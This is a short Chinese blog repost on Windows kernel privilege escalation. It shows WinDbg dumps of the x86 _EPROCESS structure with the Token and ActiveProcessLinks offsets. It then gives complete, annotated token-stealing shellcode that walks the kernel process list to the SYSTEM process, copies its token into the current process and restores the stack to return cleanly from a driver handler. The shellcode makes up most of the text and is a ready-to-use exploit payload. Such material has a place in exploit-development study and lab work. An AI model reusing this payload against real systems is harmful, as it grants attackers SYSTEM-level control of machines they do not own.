windows 提权

Posted yizhanlvcha

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了windows 提权相关的知识,希望对你有一定的参考价值。

1. 使用token

PROCESS 结构中的Token 偏移,在x86 系统中偏移0xf8
进程由双链表组成,通过_LIST_ENTRY 来链接,通过循环进程偏移0xb8 来获取所有进程偏移0xb8的地址

kd> !process 0 0 system
PROCESS 860dac78  SessionId: none  Cid: 0004    Peb: 00000000  ParentCid: 0000
    DirBase: 00185000  ObjectTable: 8c001bb8  HandleCount: 518.
    Image: System

kd> dt _EPROCESS 860dac78  
ntdll!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER 0x1d3f694`30d11160
   +0x0a8 ExitTime         : _LARGE_INTEGER 0x0
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : 0x00000004 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY [ 0x870676d8 - 0x8416f368 ]
   +0x0c0 ProcessQuotaUsage : [2] 0
   +0x0c8 ProcessQuotaPeak : [2] 0
   +0x0d0 CommitCharge     : 0xb
   +0x0d4 QuotaBlock       : 0x841631c0 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : (null) 
   +0x0dc PeakVirtualSize  : 0x770000
   +0x0e0 VirtualSize      : 0x1f0000
   +0x0e4 SessionProcessLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
   +0x0ec DebugPort        : (null) 
   +0x0f0 ExceptionPortData : (null) 
   +0x0f0 ExceptionPortValue : 0
   +0x0f0 ExceptionPortState : 0y000
   +0x0f4 ObjectTable      : 0x8c001bb8 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
   +0x0fc WorkingSetPage   : 0
   +0x100 AddressCreationLock : _EX_PUSH_LOCK
   +0x104 RotateInProgress : (null) 
   +0x108 ForkInProgress   : (null) 

SHELLCODE

        "\x60"      // pushad                                       ; Save register state on the Stack
        "\x64\xA1\x24\x01\x00\x00"  // mov eax, fs:[KTHREAD_OFFSET]         ; nt!_KPCR.PcrbData.CurrentThread
        "\x8B\x40\x50"          // mov eax, [eax + EPROCESS_OFFSET]     ; nt!_KTHREAD.ApcState.Process
        "\x89\xC1"          // mov ecx, eax (Current _EPROCESS structure)   
        "\x8B\x98\xF8\x00\x00\x00"  // mov ebx, [eax + TOKEN_OFFSET]        ; nt!_EPROCESS.Token
        //---[Copy System PID token]
        "\xBA\x04\x00\x00\x00"      // mov edx, 4 (SYSTEM PID)          ; PID 4 -> System
        "\x8B\x80\xB8\x00\x00\x00"  // mov eax, [eax + FLINK_OFFSET] <-|        ; nt!_EPROCESS.ActiveProcessLinks.Flink
        "\x2D\xB8\x00\x00\x00"      // sub eax, FLINK_OFFSET           |
        "\x39\x90\xB4\x00\x00\x00"  // cmp [eax + PID_OFFSET], edx     |        ; nt!_EPROCESS.UniqueProcessId
        "\x75\xED"          // jnz                           ->|        ; Loop !(PID=4)
        "\x8B\x90\xF8\x00\x00\x00"  // mov edx, [eax + TOKEN_OFFSET]        ; System nt!_EPROCESS.Token
        "\x89\x91\xF8\x00\x00\x00"  // mov [ecx + TOKEN_OFFSET], edx        ; Replace Current Process token
        //---[Recover]
        "\x61"              // popad                                        ; Restore register state from the Stack     
        "\x81\xC4\x8C\x07\x00\x00"  // add esp,0x78c                ; Offset of IRP on stack
        "\x8B\x3C\x24"          // mov edi,DWORD PTR [esp]          ; Restore the pointer to IRP
        "\x83\xC4\x08"          // add esp,0x8                  ; Offset of DbgPrint string
        "\x8B\x1C\x24"          // mov ebx,DWORD PTR [esp]          ; Restore the DbgPrint string
        "\x81\xC4\x34\x02\x00\x00"  // add esp,0x234                ; Target frame to return
        "\x31\xC0"          // NTSTATUS -> STATUS_SUCCESS :p
        "\x5D"              // pop ebp                                      ; Restore saved EBP
        "\xC2\x08\x00"          // ret 8                                        ; Return cleanly

以上是关于windows 提权的主要内容,如果未能解决你的问题,请参考以下文章

windows靶场提权总结

Windows提权第一篇-内核溢出漏洞提权

windows提权—msfatsc提权

windows提权—msfatsc提权

windows 提权命令是啥?

Windows 提权